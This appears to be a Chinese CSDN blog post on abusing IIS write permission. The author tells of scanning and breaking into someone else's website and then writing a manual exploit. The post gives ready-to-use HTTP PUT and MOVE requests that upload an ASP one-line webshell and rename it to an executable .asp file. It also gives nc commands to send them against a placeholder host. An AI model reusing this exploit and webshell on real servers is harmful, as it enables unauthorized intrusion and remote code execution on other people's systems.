很老的东西了,严格的说不是漏洞,只是设置不善造成的Bug。八百年遇不到一会,结果前几天不幸碰上了。
用JSKY扫描人家的站,结果扫描器居然直接把人家整站给删了= =#(这也是百年不遇吧....囧,我猜JSKY用的参数一定是“/”)。
还好,最后搞进去把人家的站恢复了,真惊险。还义务帮他补漏洞,删后门......
其中用到了IIS写权限利用工具,桂林老兵版的没带身上,网上下到了zwell版的,结果没成功,最后自己动手写了一个手动版的,看来还是“自己动手,丰衣足食”哇,呼呼。
分别保存下面两个TXT文件。
//PUT.TXT
PUT /zerosoul.txt HTTP/1.1
HOST: www.xxx.com
Content-Length: 24
<%Execute request(’#’)%>
//MOVE.TXT
MOVE /zerosoul.txt HTTP/1.1
HOST: www.xxx.com
Destination: http://www.xxx.com/zerosoul.asp
(别忘了上面有两下回车)
然后在CMD分别输入以下命令即可:
c:/>nc www.xxx.com 80<PUT.TXT
c:/>nc www.xxx.com 80<MOVE.TXT
然后就得到了地址为http://www.xxx.com/zerosoul.asp的一句话。
通过上面文本的内容,我们可以轻易看出IIS写权限是怎么利用的:
1.使用PUT方式上传后缀名为TXT的一句话马(不能直接上传IIS能解析的文件)。
IIS写权限漏洞原理&利用工具手动版
最新推荐文章于 2024-08-07 22:45:32 发布
本文介绍了IIS写权限漏洞的原理和手工利用方法,包括PUT和MOVE指令来上传和改后缀,以实现远程代码执行。通过手动操作,可以理解漏洞利用过程,并在没有现成工具时自行创建。
摘要由CSDN通过智能技术生成